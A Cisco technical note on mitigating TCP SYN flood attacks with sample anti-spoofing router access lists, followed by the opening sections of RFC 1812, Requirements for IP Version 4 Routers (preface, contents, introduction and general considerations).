The TCP SYN attack is characterized by an influx of SYN packets from random source IP addresses. Any device behind a firewall that stops inbound SYN packets is already protected from this mode of attack and no further action is needed. Examples of firewalls include a Cisco Private Internet Exchange (PIX) Firewall or a Cisco router configured with access lists. For examples of how to set up access lists on a Cisco router, please refer to the document Increasing Security On IP Networks.
Devices Offering Publicly Available Services (Mail Servers, Public Web Servers)

Preventing SYN attacks on devices behind firewalls from random IP addresses is relatively simple since you can use access lists to explicitly limit inbound access to a select few IP addresses. However, in the case of a public web server or mail server facing the Internet, there is no way to determine which incoming IP source addresses are friendly and which are unfriendly. Therefore, there is no clear cut defense against an attack from a random IP address. Several options are available to hosts:

*

Increase the size of the connection queue (SYN ACK queue).
*

Decrease the time-out waiting for the three-way handshake.
*

Employ vendor software patches to detect and circumvent the problem (if available).

You should contact your host vendor to see if they have created specific patches to address the TCP SYN ACK attack.

Note: Filtering IP addresses at the server is ineffective since an attacker can vary his IP address, and the address may or may not be the same as that of a legitimate host.
Preventing A Network from Unwittingly Hosting an Attack

Since a primary mechanism of this denial of service attack is the generation of traffic sourced from random IP addresses, we recommend filtering traffic destined for the Internet. The basic concept is to throw away packets with invalid source IP addresses as they enter the Internet. This does not prevent a denial of service attack on your network, but will help attacked parties rule out your location as the source of the attacker. In addition, it makes your network less attractive as a base for this class of attack.
Preventing Transmission of Invalid IP Addresses

By filtering packets on your routers that connect your network to the Internet, you can permit only packets with valid source IP addresses to leave your network and get into the Internet.

For example, if your network consists of network 172.16.0.0, and your router connects to your ISP using a serial 0/1 interface, you can apply the access list as follows:

access-list 111 permit ip 172.16.0.0 0.0.255.255 any
access-list 111 deny ip any any log

interface serial 0/1
ip access-group 111 out

Note: The last line of the access list determines if there is any traffic with an invalid source address entering the Internet. It is not crucial to have this line, but it will help locate the source of the possible attacks.
Preventing Reception of Invalid IP Addresses

For ISPs who provide service to end networks, we highly recommend the validation of incoming packets from your clients. This can be accomplished by the use of inbound packet filters on your border routers.

For example, if your clients have the following network numbers connected to your router via a serial interface named "serial 1/0", you can create the following access list:

The network numbers are 192.168.0.0 to 192.168.15.0, and 172.18.0.0.

access-list 111 permit ip 192.168.0.0 0.0.15.255 any
access-list 111 permit ip 172.18.0.0 0.0.255.255 any
access-list 111 deny ip any any log

interface serial 1/0
ip access-group 111 in

Note: The last line of the access list determines if there is any traffic with invalid source addresses entering the Internet. It is not crucial to have this line, but it will help locate the source of the possible attack.

This topic has been discussed in some detail on the NANOG [North American Network Operator1s Group] mailing list. The list archives are located at: http://www.merit.edu/mail.archives/nanog/index.html leavingcisco.com

For a detailed description of the TCP SYN denial of service attack and IP spoofing, see: http://www.cert.org/advisories/CA-1996-21.html leavingcisco.com

http://www.cert.org/advisories/CA-1995-01.html leavingcisco.com
Related Information

* Technical Support - Cisco Systems

RFC 1812 (RFC1812)

Internet RFC/STD/FYI/BCP Archives
[ RFC Index | RFC Search | Usenet FAQs | Web FAQs | Documents | Cities ]

Alternate Formats: rfc1812.txt | rfc1812.txt.pdf

Comment on RFC 1812
RFC 1812 - Requirements for IP Version 4 Routers

Network Working Group F. Baker, Editor
Request for Comments: 1812 Cisco Systems
Obsoletes: 1716, 1009 June 1995
Category: Standards Track

Requirements for IP Version 4 Routers

Status of this Memo

This document specifies an Internet standards track protocol for the
Internet community, and requests discussion and suggestions for
improvements. Please refer to the current edition of the "Internet
Official Protocol Standards" (STD 1) for the standardization state
and status of this protocol. Distribution of this memo is unlimited.

PREFACE

This document is an updated version of RFC 1716, the historical
Router Requirements document. That RFC preserved the significant
work that went into the working group, but failed to adequately
describe current technology for the IESG to consider it a current
standard.

The current editor had been asked to bring the document up to date,
so that it is useful as a procurement specification and a guide to
implementors. In this, he stands squarely on the shoulders of those
who have gone before him, and depends largely on expert contributors
for text. Any credit is theirs; the errors are his.

The content and form of this document are due, in large part, to the
working group's chair, and document's original editor and author:
Philip Almquist. It is also largely due to the efforts of its
previous editor, Frank Kastenholz. Without their efforts, this
document would not exist.

Table of Contents

1. INTRODUCTION ........................................ 6
1.1 Reading this Document .............................. 8
1.1.1 Organization ..................................... 8
1.1.2 Requirements ..................................... 9
1.1.3 Compliance ....................................... 10
1.2 Relationships to Other Standards ................... 11
1.3 General Considerations ............................. 12
1.3.1 Continuing Internet Evolution .................... 12
1.3.2 Robustness Principle ............................. 13
1.3.3 Error Logging .................................... 14

1.3.4 Configuration .................................... 14
1.4 Algorithms ......................................... 16
2. INTERNET ARCHITECTURE ............................... 16
2.1 Introduction ....................................... 16
2.2 Elements of the Architecture ....................... 17
2.2.1 Protocol Layering ................................ 17
2.2.2 Networks ......................................... 19
2.2.3 Routers .......................................... 20
2.2.4 Autonomous Systems ............................... 21
2.2.5 Addressing Architecture .......................... 21
2.2.5.1 Classical IP Addressing Architecture ........... 21
2.2.5.2 Classless Inter Domain Routing (CIDR) .......... 23
2.2.6 IP Multicasting .................................. 24
2.2.7 Unnumbered Lines and Networks Prefixes ........... 25
2.2.8 Notable Oddities ................................. 26
2.2.8.1 Embedded Routers ............................... 26
2.2.8.2 Transparent Routers ............................ 27
2.3 Router Characteristics ............................. 28
2.4 Architectural Assumptions .......................... 31
3. LINK LAYER .......................................... 32
3.1 INTRODUCTION ....................................... 32
3.2 LINK/INTERNET LAYER INTERFACE ...................... 33
3.3 SPECIFIC ISSUES .................................... 34
3.3.1 Trailer Encapsulation ............................ 34
3.3.2 Address Resolution Protocol - ARP ................ 34
3.3.3 Ethernet and 802.3 Coexistence ................... 35
3.3.4 Maximum Transmission Unit - MTU .................. 35
3.3.5 Point-to-Point Protocol - PPP .................... 35
3.3.5.1 Introduction ................................... 36
3.3.5.2 Link Control Protocol (LCP) Options ............ 36
3.3.5.3 IP Control Protocol (IPCP) Options ............. 38
3.3.6 Interface Testing ................................ 38
4. INTERNET LAYER - PROTOCOLS .......................... 39
4.1 INTRODUCTION ....................................... 39
4.2 INTERNET PROTOCOL - IP ............................. 39
4.2.1 INTRODUCTION ..................................... 39
4.2.2 PROTOCOL WALK-THROUGH ............................ 40
4.2.2.1 Options: RFC 791 Section 3.2 ................... 40
4.2.2.2 Addresses in Options: RFC 791 Section 3.1 ...... 42
4.2.2.3 Unused IP Header Bits: RFC 791 Section 3.1 ..... 43
4.2.2.4 Type of Service: RFC 791 Section 3.1 ........... 44
4.2.2.5 Header Checksum: RFC 791 Section 3.1 ........... 44
4.2.2.6 Unrecognized Header Options: RFC 791,
Section 3.1 .................................... 44
4.2.2.7 Fragmentation: RFC 791 Section 3.2 ............. 45
4.2.2.8 Reassembly: RFC 791 Section 3.2 ................ 46
4.2.2.9 Time to Live: RFC 791 Section 3.2 .............. 46
4.2.2.10 Multi-subnet Broadcasts: RFC 922 .............. 47

4.2.2.11 Addressing: RFC 791 Section 3.2 ............... 47
4.2.3 SPECIFIC ISSUES .................................. 50
4.2.3.1 IP Broadcast Addresses ......................... 50
4.2.3.2 IP Multicasting ................................ 50
4.2.3.3 Path MTU Discovery ............................. 51
4.2.3.4 Subnetting ..................................... 51
4.3 INTERNET CONTROL MESSAGE PROTOCOL - ICMP ........... 52
4.3.1 INTRODUCTION ..................................... 52
4.3.2 GENERAL ISSUES ................................... 53
4.3.2.1 Unknown Message Types .......................... 53
4.3.2.2 ICMP Message TTL ............................... 53
4.3.2.3 Original Message Header ........................ 53
4.3.2.4 ICMP Message Source Address .................... 53
4.3.2.5 TOS and Precedence ............................. 54
4.3.2.6 Source Route ................................... 54
4.3.2.7 When Not to Send ICMP Errors ................... 55
4.3.2.8 Rate Limiting .................................. 56
4.3.3 SPECIFIC ISSUES .................................. 56
4.3.3.1 Destination Unreachable ........................ 56
4.3.3.2 Redirect ....................................... 57
4.3.3.3 Source Quench .................................. 57
4.3.3.4 Time Exceeded .................................. 58
4.3.3.5 Parameter Problem .............................. 58
4.3.3.6 Echo Request/Reply ............................. 58
4.3.3.7 Information Request/Reply ...................... 59
4.3.3.8 Timestamp and Timestamp Reply .................. 59
4.3.3.9 Address Mask Request/Reply ..................... 61
4.3.3.10 Router Advertisement and Solicitations ........ 62
4.4 INTERNET GROUP MANAGEMENT PROTOCOL - IGMP .......... 62
5. INTERNET LAYER - FORWARDING ......................... 63
5.1 INTRODUCTION ....................................... 63
5.2 FORWARDING WALK-THROUGH ............................ 63
5.2.1 Forwarding Algorithm ............................. 63
5.2.1.1 General ........................................ 64
5.2.1.2 Unicast ........................................ 64
5.2.1.3 Multicast ...................................... 65
5.2.2 IP Header Validation ............................. 67
5.2.3 Local Delivery Decision .......................... 69
5.2.4 Determining the Next Hop Address ................. 71
5.2.4.1 IP Destination Address ......................... 72
5.2.4.2 Local/Remote Decision .......................... 72
5.2.4.3 Next Hop Address ............................... 74
5.2.4.4 Administrative Preference ...................... 77
5.2.4.5 Load Splitting ................................. 79
5.2.5 Unused IP Header Bits: RFC-791 Section 3.1 ....... 79
5.2.6 Fragmentation and Reassembly: RFC-791,
Section 3.2 ...................................... 80
5.2.7 Internet Control Message Protocol - ICMP ......... 80

5.2.7.1 Destination Unreachable ........................ 80
5.2.7.2 Redirect ....................................... 82
5.2.7.3 Time Exceeded .................................. 84
5.2.8 INTERNET GROUP MANAGEMENT PROTOCOL - IGMP ........ 84
5.3 SPECIFIC ISSUES .................................... 85
5.3.1 Time to Live (TTL) ............................... 85
5.3.2 Type of Service (TOS) ............................ 86
5.3.3 IP Precedence .................................... 87
5.3.3.1 Precedence-Ordered Queue Service ............... 88
5.3.3.2 Lower Layer Precedence Mappings ................ 89
5.3.3.3 Precedence Handling For All Routers ............ 90
5.3.4 Forwarding of Link Layer Broadcasts .............. 92
5.3.5 Forwarding of Internet Layer Broadcasts .......... 92
5.3.5.1 Limited Broadcasts ............................. 93
5.3.5.2 Directed Broadcasts ............................ 93
5.3.5.3 All-subnets-directed Broadcasts ................ 94
5.3.5.4 Subnet-directed Broadcasts .................... 94
5.3.6 Congestion Control ............................... 94
5.3.7 Martian Address Filtering ........................ 96
5.3.8 Source Address Validation ........................ 97
5.3.9 Packet Filtering and Access Lists ................ 97
5.3.10 Multicast Routing ............................... 98
5.3.11 Controls on Forwarding .......................... 98
5.3.12 State Changes ................................... 99
5.3.12.1 When a Router Ceases Forwarding ............... 99
5.3.12.2 When a Router Starts Forwarding ............... 100
5.3.12.3 When an Interface Fails or is Disabled ........ 100
5.3.12.4 When an Interface is Enabled .................. 100
5.3.13 IP Options ...................................... 101
5.3.13.1 Unrecognized Options .......................... 101
5.3.13.2 Security Option ............................... 101
5.3.13.3 Stream Identifier Option ...................... 101
5.3.13.4 Source Route Options .......................... 101
5.3.13.5 Record Route Option ........................... 102
5.3.13.6 Timestamp Option .............................. 102
6. TRANSPORT LAYER ..................................... 103
6.1 USER DATAGRAM PROTOCOL - UDP ....................... 103
6.2 TRANSMISSION CONTROL PROTOCOL - TCP ................ 104
7. APPLICATION LAYER - ROUTING PROTOCOLS ............... 106
7.1 INTRODUCTION ....................................... 106
7.1.1 Routing Security Considerations .................. 106
7.1.2 Precedence ....................................... 107
7.1.3 Message Validation ............................... 107
7.2 INTERIOR GATEWAY PROTOCOLS ......................... 107
7.2.1 INTRODUCTION ..................................... 107
7.2.2 OPEN SHORTEST PATH FIRST - OSPF .................. 108
7.2.3 INTERMEDIATE SYSTEM TO INTERMEDIATE SYSTEM -
DUAL IS-IS ....................................... 108

7.3 EXTERIOR GATEWAY PROTOCOLS ........................ 109
7.3.1 INTRODUCTION .................................... 109
7.3.2 BORDER GATEWAY PROTOCOL - BGP .................... 109
7.3.2.1 Introduction ................................... 109
7.3.2.2 Protocol Walk-through .......................... 110
7.3.3 INTER-AS ROUTING WITHOUT AN EXTERIOR PROTOCOL
.................................................. 110
7.4 STATIC ROUTING ..................................... 111
7.5 FILTERING OF ROUTING INFORMATION ................... 112
7.5.1 Route Validation ................................. 113
7.5.2 Basic Route Filtering ............................ 113
7.5.3 Advanced Route Filtering ......................... 114
7.6 INTER-ROUTING-PROTOCOL INFORMATION EXCHANGE ........ 114
8. APPLICATION LAYER - NETWORK MANAGEMENT PROTOCOLS
..................................................... 115
8.1 The Simple Network Management Protocol - SNMP ...... 115
8.1.1 SNMP Protocol Elements ........................... 115
8.2 Community Table .................................... 116
8.3 Standard MIBS ...................................... 118
8.4 Vendor Specific MIBS ............................... 119
8.5 Saving Changes ..................................... 120
9. APPLICATION LAYER - MISCELLANEOUS PROTOCOLS ......... 120
9.1 BOOTP .............................................. 120
9.1.1 Introduction ..................................... 120
9.1.2 BOOTP Relay Agents ............................... 121
10. OPERATIONS AND MAINTENANCE ......................... 122
10.1 Introduction ...................................... 122
10.2 Router Initialization ............................. 123
10.2.1 Minimum Router Configuration .................... 123
10.2.2 Address and Prefix Initialization ............... 124
10.2.3 Network Booting using BOOTP and TFTP ............ 125
10.3 Operation and Maintenance ......................... 126
10.3.1 Introduction .................................... 126
10.3.2 Out Of Band Access .............................. 127
10.3.2 Router O&M Functions ............................ 127
10.3.2.1 Maintenance - Hardware Diagnosis .............. 127
10.3.2.2 Control - Dumping and Rebooting ............... 127
10.3.2.3 Control - Configuring the Router .............. 128
10.3.2.4 Net Booting of System Software ................ 128
10.3.2.5 Detecting and responding to misconfiguration
............................................... 129
10.3.2.6 Minimizing Disruption ......................... 130
10.3.2.7 Control - Troubleshooting Problems ............ 130
10.4 Security Considerations ........................... 131
10.4.1 Auditing and Audit Trails ....................... 131
10.4.2 Configuration Control ........................... 132
11. REFERENCES ......................................... 133
APPENDIX A. REQUIREMENTS FOR SOURCE-ROUTING HOSTS ...... 145

APPENDIX B. GLOSSARY ................................... 146
APPENDIX C. FUTURE DIRECTIONS .......................... 152
APPENDIX D. Multicast Routing Protocols ................ 154
D.1 Introduction ....................................... 154
D.2 Distance Vector Multicast Routing Protocol -
DVMRP .............................................. 154
D.3 Multicast Extensions to OSPF - MOSPF ............... 154
D.4 Protocol Independent Multicast - PIM ............... 155
APPENDIX E Additional Next-Hop Selection Algorithms
................................................... 155
E.1. Some Historical Perspective ....................... 155
E.2. Additional Pruning Rules .......................... 157
E.3 Some Route Lookup Algorithms ....................... 159
E.3.1 The Revised Classic Algorithm .................... 159
E.3.2 The Variant Router Requirements Algorithm ........ 160
E.3.3 The OSPF Algorithm ............................... 160
E.3.4 The Integrated IS-IS Algorithm ................... 162
Security Considerations ................................ 163
APPENDIX F: HISTORICAL ROUTING PROTOCOLS ............... 164
F.1 EXTERIOR GATEWAY PROTOCOL - EGP .................... 164
F.1.1 Introduction ..................................... 164
F.1.2 Protocol Walk-through ............................ 165
F.2 ROUTING INFORMATION PROTOCOL - RIP ................. 167
F.2.1 Introduction ..................................... 167
F.2.2 Protocol Walk-Through ............................ 167
F.2.3 Specific Issues .................................. 172
F.3 GATEWAY TO GATEWAY PROTOCOL - GGP .................. 173
Acknowledgments ........................................ 173
Editor's Address ....................................... 175

1. INTRODUCTION

This memo replaces for RFC 1716, "Requirements for Internet Gateways"
([INTRO:1]).

This memo defines and discusses requirements for devices that perform
the network layer forwarding function of the Internet protocol suite.
The Internet community usually refers to such devices as IP routers or
simply routers; The OSI community refers to such devices as
intermediate systems. Many older Internet documents refer to these
devices as gateways, a name which more recently has largely passed out
of favor to avoid confusion with application gateways.

An IP router can be distinguished from other sorts of packet switching
devices in that a router examines the IP protocol header as part of
the switching process. It generally removes the Link Layer header a
message was received with, modifies the IP header, and replaces the
Link Layer header for retransmission.

The authors of this memo recognize, as should its readers, that many
routers support more than one protocol. Support for multiple protocol
suites will be required in increasingly large parts of the Internet in
the future. This memo, however, does not attempt to specify Internet
requirements for protocol suites other than TCP/IP.

This document enumerates standard protocols that a router connected to
the Internet must use, and it incorporates by reference the RFCs and
other documents describing the current specifications for these
protocols. It corrects errors in the referenced documents and adds
additional discussion and guidance for an implementor.

For each protocol, this memo also contains an explicit set of
requirements, recommendations, and options. The reader must
understand that the list of requirements in this memo is incomplete by
itself. The complete set of requirements for an Internet protocol
router is primarily defined in the standard protocol specification
documents, with the corrections, amendments, and supplements contained
in this memo.

This memo should be read in conjunction with the Requirements for
Internet Hosts RFCs ([INTRO:2] and [INTRO:3]). Internet hosts and
routers must both be capable of originating IP datagrams and receiving
IP datagrams destined for them. The major distinction between
Internet hosts and routers is that routers implement forwarding
algorithms, while Internet hosts do not require forwarding
capabilities. Any Internet host acting as a router must adhere to the
requirements contained in this memo.

The goal of open system interconnection dictates that routers must
function correctly as Internet hosts when necessary. To achieve this,
this memo provides guidelines for such instances. For simplification
and ease of document updates, this memo tries to avoid overlapping
discussions of host requirements with [INTRO:2] and [INTRO:3] and
incorporates the relevant requirements of those documents by
reference. In some cases the requirements stated in [INTRO:2] and
[INTRO:3] are superseded by this document.

A good-faith implementation of the protocols produced after careful
reading of the RFCs should differ from the requirements of this memo
in only minor ways. Producing such an implementation often requires
some interaction with the Internet technical community, and must
follow good communications software engineering practices. In many
cases, the requirements in this document are already stated or implied
in the standard protocol documents, so that their inclusion here is,
in a sense, redundant. They were included because some past
implementation has made the wrong choice, causing problems of
interoperability, performance, and/or robustness.

This memo includes discussion and explanation of many of the
requirements and recommendations. A simple list of requirements would
be dangerous, because:

o Some required features are more important than others, and some
features are optional.

o Some features are critical in some applications of routers but
irrelevant in others.

o There may be valid reasons why particular vendor products that are
designed for restricted contexts might choose to use different
specifications.

However, the specifications of this memo must be followed to meet the
general goal of arbitrary router interoperation across the diversity
and complexity of the Internet. Although most current implementations
fail to meet these requirements in various ways, some minor and some
major, this specification is the ideal towards which we need to move.

These requirements are based on the current level of Internet
architecture. This memo will be updated as required to provide
additional clarifications or to include additional information in
those areas in which specifications are still evolving.

1.1 Reading this Document

1.1.1 Organization

This memo emulates the layered organization used by [INTRO:2] and
[INTRO:3]. Thus, Chapter 2 describes the layers found in the Internet
architecture. Chapter 3 covers the Link Layer. Chapters 4 and 5 are
concerned with the Internet Layer protocols and forwarding algorithms.
Chapter 6 covers the Transport Layer. Upper layer protocols are
divided among Chapters 7, 8, and 9. Chapter 7 discusses the protocols
which routers use to exchange routing information with each other.
Chapter 8 discusses network management. Chapter 9 discusses other
upper layer protocols. The final chapter covers operations and
maintenance features. This organization was chosen for simplicity,
clarity, and consistency with the Host Requirements RFCs. Appendices
to this memo include a bibliography, a glossary, and some conjectures
about future directions of router standards.

In describing the requirements, we assume that an implementation
strictly mirrors the layering of the protocols. However, strict
layering is an imperfect model, both for the protocol suite and for
recommended implementation approaches. Protocols in different layers
interact in complex and sometimes subtle ways, and particular

functions often involve multiple layers. There are many design
choices in an implementation, many of which involve creative breaking
of strict layering. Every implementor is urged to read [INTRO:4] and
[INTRO:5].

Each major section of this memo is organized into the following
subsections:

(1) Introduction

(2) Protocol Walk-Through - considers the protocol specification
documents section-by-section, correcting errors, stating
requirements that may be ambiguous or ill-defined, and providing
further clarification or explanation.

(3) Specific Issues - discusses protocol design and implementation
issues that were not included in the walk-through.

Under many of the individual topics in this memo, there is
parenthetical material labeled DISCUSSION or IMPLEMENTATION. This
material is intended to give a justification, clarification or
explanation to the preceding requirements text. The implementation
material contains suggested approaches that an implementor may want to
consider. The DISCUSSION and IMPLEMENTATION sections are not part of
the standard.

1.1.2 Requirements

In this memo, the words that are used to define the significance of
each particular requirement are capitalized. These words are:

o MUST
This word means that the item is an absolute requirement of the
specification. Violation of such a requirement is a fundamental
error; there is no case where it is justified.

o MUST IMPLEMENT
This phrase means that this specification requires that the item be
implemented, but does not require that it be enabled by default.

o MUST NOT
This phrase means that the item is an absolute prohibition of the
specification.

o SHOULD
This word means that there may exist valid reasons in particular
circumstances to ignore this item, but the full implications should
be understood and the case carefully weighed before choosing a

different course.

o SHOULD IMPLEMENT
This phrase is similar in meaning to SHOULD, but is used when we
recommend that a particular feature be provided but does not
necessarily recommend that it be enabled by default.

o SHOULD NOT
This phrase means that there may exist valid reasons in particular
circumstances when the described behavior is acceptable or even
useful. Even so, the full implications should be understood and
the case carefully weighed before implementing any behavior
described with this label.

o MAY
This word means that this item is truly optional. One vendor may
choose to include the item because a particular marketplace
requires it or because it enhances the product, for example;
another vendor may omit the same item.

1.1.3 Compliance

Some requirements are applicable to all routers. Other requirements
are applicable only to those which implement particular features or
protocols. In the following paragraphs, relevant refers to the union
of the requirements applicable to all routers and the set of
requirements applicable to a particular router because of the set of
features and protocols it has implemented.

Note that not all Relevant requirements are stated directly in this
memo. Various parts of this memo incorporate by reference sections of
the Host Requirements specification, [INTRO:2] and [INTRO:3]. For
purposes of determining compliance with this memo, it does not matter
whether a Relevant requirement is stated directly in this memo or
merely incorporated by reference from one of those documents.

An implementation is said to be conditionally compliant if it
satisfies all the Relevant MUST, MUST IMPLEMENT, and MUST NOT
requirements. An implementation is said to be unconditionally
compliant if it is conditionally compliant and also satisfies all the
Relevant SHOULD, SHOULD IMPLEMENT, and SHOULD NOT requirements. An
implementation is not compliant if it is not conditionally compliant
(i.e., it fails to satisfy one or more of the Relevant MUST, MUST
IMPLEMENT, or MUST NOT requirements).

This specification occasionally indicates that an implementation
SHOULD implement a management variable, and that it SHOULD have a
certain default value. An unconditionally compliant implementation

implements the default behavior, and if there are other implemented
behaviors implements the variable. A conditionally compliant
implementation clearly documents what the default setting of the
variable is or, in the absence of the implementation of a variable,
may be construed to be. An implementation that both fails to
implement the variable and chooses a different behavior is not
compliant.

For any of the SHOULD and SHOULD NOT requirements, a router may
provide a configuration option that will cause the router to act other
than as specified by the requirement. Having such a configuration
option does not void a router's claim to unconditional compliance if
the option has a default setting, and that setting causes the router
to operate in the required manner.

Likewise, routers may provide, except where explicitly prohibited by
this memo, options which cause them to violate MUST or MUST NOT
requirements. A router that provides such options is compliant
(either fully or conditionally) if and only if each such option has a
default setting that causes the router to conform to the requirements
of this memo. Please note that the authors of this memo, although
aware of market realities, strongly recommend against provision of
such options. Requirements are labeled MUST or MUST NOT because
experts in the field have judged them to be particularly important to
interoperability or proper functioning in the Internet. Vendors
should weigh carefully the customer support costs of providing options
that violate those rules.

Of course, this memo is not a complete specification of an IP router,
but rather is closer to what in the OSI world is called a profile.
For example, this memo requires that a number of protocols be
implemented. Although most of the contents of their protocol
specifications are not repeated in this memo, implementors are
nonetheless required to implement the protocols according to those
specifications.

1.2 Relationships to Other Standards

There are several reference documents of interest in checking the
status of protocol specifications and standardization:

o INTERNET OFFICIAL PROTOCOL STANDARDS
This document describes the Internet standards process and lists
the standards status of the protocols. As of this writing, the
current version of this document is STD 1, RFC 1780, [ARCH:7].
This document is periodically re-issued. You should always
consult an RFC repository and use the latest version of this
document.

o Assigned Numbers
This document lists the assigned values of the parameters used in
the various protocols. For example, it lists IP protocol codes,
TCP port numbers, Telnet Option Codes, ARP hardware types, and
Terminal Type names. As of this writing, the current version of
this document is STD 2, RFC 1700, [INTRO:7]. This document is
periodically re-issued. You should always consult an RFC
repository and use the latest version of this document.

o Host Requirements
This pair of documents reviews the specifications that apply to
hosts and supplies guidance and clarification for any
ambiguities. Note that these requirements also apply to routers,
except where otherwise specified in this memo. As of this
writing, the current versions of these documents are RFC 1122 and
RFC 1123 (STD 3), [INTRO:2] and [INTRO:3].

o Router Requirements (formerly Gateway Requirements)
This memo.

Note that these documents are revised and updated at different times;
in case of differences between these documents, the most recent must
prevail.

These and other Internet protocol documents may be obtained from the:

The InterNIC
DS.INTERNIC.NET
InterNIC Directory and Database Service
info@internic.net
+1-908-668-6587
URL: http://ds.internic.net/

1.3 General Considerations

There are several important lessons that vendors of Internet software
have learned and which a new vendor should consider seriously.

1.3.1 Continuing Internet Evolution

The enormous growth of the Internet has revealed problems of
management and scaling in a large datagram based packet communication
system. These problems are being addressed, and as a result there
will be continuing evolution of the specifications described in this
memo. New routing protocols, algorithms, and architectures are
constantly being developed. New internet layer protocols, and
modifications to existing protocols, are also constantly being
devised. Routers play a crucial role in the Internet, and the number

of routers deployed in the Internet is much smaller than the number
of hosts. Vendors should therefore expect that router standards will
continue to evolve much more quickly than host standards. These
changes will be carefully planned and controlled since there is
extensive participation in this planning by the vendors and by the
organizations responsible for operation of the networks.

Development, evolution, and revision are characteristic of computer
network protocols today, and this situation will persist for some
years. A vendor who develops computer communications software for
the Internet protocol suite (or any other protocol suite!) and then
fails to maintain and update that software for changing
specifications is going to leave a trail of unhappy customers. The
Internet is a large communication network, and the users are in
constant contact through it. Experience has shown that knowledge of
deficiencies in vendor software propagates quickly through the
Internet technical community.

1.3.2 Robustness Principle

At every layer of the protocols, there is a general rule (from
[TRANS:2] by Jon Postel) whose application can lead to enormous
benefits in robustness and interoperability:

Be conservative in what you do,
be liberal in what you accept from others.

Software should be written to deal with every conceivable error, no
matter how unlikely. Eventually a packet will come in with that
particular combination of errors and attributes, and unless the
software is prepared, chaos can ensue. It is best to assume that the
network is filled with malevolent entities that will send packets
designed to have the worst possible effect. This assumption will
lead to suitably protective design. The most serious problems in the
Internet have been caused by unforeseen mechanisms triggered by low
probability events; mere human malice would never have taken so
devious a course!

Adaptability to change must be designed into all levels of router
software. As a simple example, consider a protocol specification
that contains an enumeration of values for a particular header field
- e.g., a type field, a port number, or an error code; this
enumeration must be assumed to be incomplete. If the protocol
specification defines four possible error codes, the software must
not break when a fifth code is defined. An undefined code might be
logged, but it must not cause a failure.

The second part of the principal is almost as important: software on
hosts or other routers may contain deficiencies that make it unwise
to exploit legal but obscure protocol features. It is unwise to
stray far from the obvious and simple, lest untoward effects result
elsewhere. A corollary of this is watch out for misbehaving hosts;
router software should be prepared to survive in the presence of
misbehaving hosts. An important function of routers in the Internet
is to limit the amount of disruption such hosts can inflict on the
shared communication facility.

1.3.3 Error Logging

The Internet includes a great variety of systems, each implementing
many protocols and protocol layers, and some of these contain bugs
and misguided features in their Internet protocol software. As a
result of complexity, diversity, and distribution of function, the
diagnosis of problems is often very difficult.

Problem diagnosis will be aided if routers include a carefully
designed facility for logging erroneous or strange events. It is
important to include as much diagnostic information as possible when
an error is logged. In particular, it is often useful to record the
header(s) of a packet that caused an error. However, care must be
taken to ensure that error logging does not consume prohibitive
amounts of resources or otherwise interfere with the operation of the
router.

There is a tendency for abnormal but harmless protocol events to
overflow error logging files; this can be avoided by using a circular
log, or by enabling logging only while diagnosing a known failure.
It may be useful to filter and count duplicate successive messages.
One strategy that seems to work well is to both:

o Always count abnormalities and make such counts accessible through
the management protocol (see Chapter 8); and
o Allow the logging of a great variety of events to be selectively
enabled. For example, it might useful to be able to log
everything or to log everything for host X.

This topic is further discussed in [MGT:5].

1.3.4 Configuration

In an ideal world, routers would be easy to configure, and perhaps
even entirely self-configuring. However, practical experience in the
real world suggests that this is an impossible goal, and that many
attempts by vendors to make configuration easy actually cause
customers more grief than they prevent. As an extreme example, a

router designed to come up and start routing packets without
requiring any configuration information at all would almost certainly
choose some incorrect parameter, possibly causing serious problems on
any networks unfortunate enough to be connected to it.

Often this memo requires that a parameter be a configurable option.
There are several reasons for this. In a few cases there currently
is some uncertainty or disagreement about the best value and it may
be necessary to update the recommended value in the future. In other
cases, the value really depends on external factors - e.g., the
distribution of its communication load, or the speeds and topology of
nearby networks - and self-tuning algorithms are unavailable and may
be insufficient. In some cases, configurability is needed because of
administrative requirements.

Finally, some configuration options are required to communicate with
obsolete or incorrect implementations of the protocols, distributed
without sources, that persist in many parts of the Internet. To make
correct systems coexist with these faulty systems, administrators
must occasionally misconfigure the correct systems. This problem
will correct itself gradually as the faulty systems are retired, but
cannot be ignored by vendors.

When we say that a parameter must be configurable, we do not intend
to require that its value be explicitly read from a configuration
file at every boot time. For many parameters, there is one value
that is appropriate for all but the most unusual situations. In such
cases, it is quite reasonable that the parameter default to that
value if not explicitly set.

This memo requires a particular value for such defaults in some
cases. The choice of default is a sensitive issue when the
configuration item controls accommodation of existing, faulty,
systems. If the Internet is to converge successfully to complete
interoperability, the default values built into implementations must
implement the official protocol, not misconfigurations to accommodate
faulty implementations. Although marketing considerations have led
some vendors to choose misconfiguration defaults, we urge vendors to
choose defaults that will conform to the standard.

Finally, we note that a vendor needs to provide adequate
documentation on all configuration parameters, their limits and
effects.

1.4 Algorithms

In several places in this memo, specific algorithms that a router
ought to follow are specified. These algorithms are not, per se,
required of the router. A router need not implement each algorithm
as it is written in this document. Rather, an implementation must
present a behavior to the external world that is the same as a
strict, literal, implementation of the specified algorithm.

Algorithms are described in a manner that differs from the way a good
implementor would implement them. For expository purposes, a style
that emphasizes conciseness, clarity, and independence from
implementation details has been chosen. A good implementor will
choose algorithms and implementation methods that produce the same
results as these algorithms, but may be more efficient or less
general.

We note that the art of efficient router implementation is outside
the scope of this memo.

2. INTERNET ARCHITECTURE

This chapter does not contain any requirements. However, it does
contain useful background information on the general architecture of
the Internet and of routers.

General background and discussion on the Internet architecture and
supporting protocol suite can be found in the DDN Protocol Handbook
[ARCH:1]; for background see for example [ARCH:2], [ARCH:3], and
[ARCH:4]. The Internet architecture and protocols are also covered
in an ever-growing number of textbooks, such as [ARCH:5] and
[ARCH:6].

2.1 Introduction

The Internet system consists of a number of interconnected packet
networks supporting communication among host computers using the
Internet protocols. These protocols include the Internet Protocol
(IP), the Internet Control Message Protocol (ICMP), the Internet
Group Management Protocol (IGMP), and a variety transport and
application protocols that depend upon them. As was described in
Section [1.2], the Internet Engineering Steering Group periodically
releases an Official Protocols memo listing all the Internet
protocols.

All Internet protocols use IP as the basic data transport mechanism.
IP is a datagram, or connectionless, internetwork service and
includes provision for addressing, type-of-service specification,

fragmentation and reassembly, and security. ICMP and IGMP are
considered integral parts of IP, although they are architecturally
layered upon IP. ICMP provides error reporting, flow control,
first-hop router redirection, and other maintenance and control
functions. IGMP provides the mechanisms by which hosts and routers
can join and leave IP multicast groups.

Reliable data delivery is provided in the Internet protocol suite by
Transport Layer protocols such as the Transmission Control Protocol
(TCP), which provides end-end retransmission, resequencing and
connection control. Transport Layer connectionless service is
provided by the User Datagram Protocol (UDP).

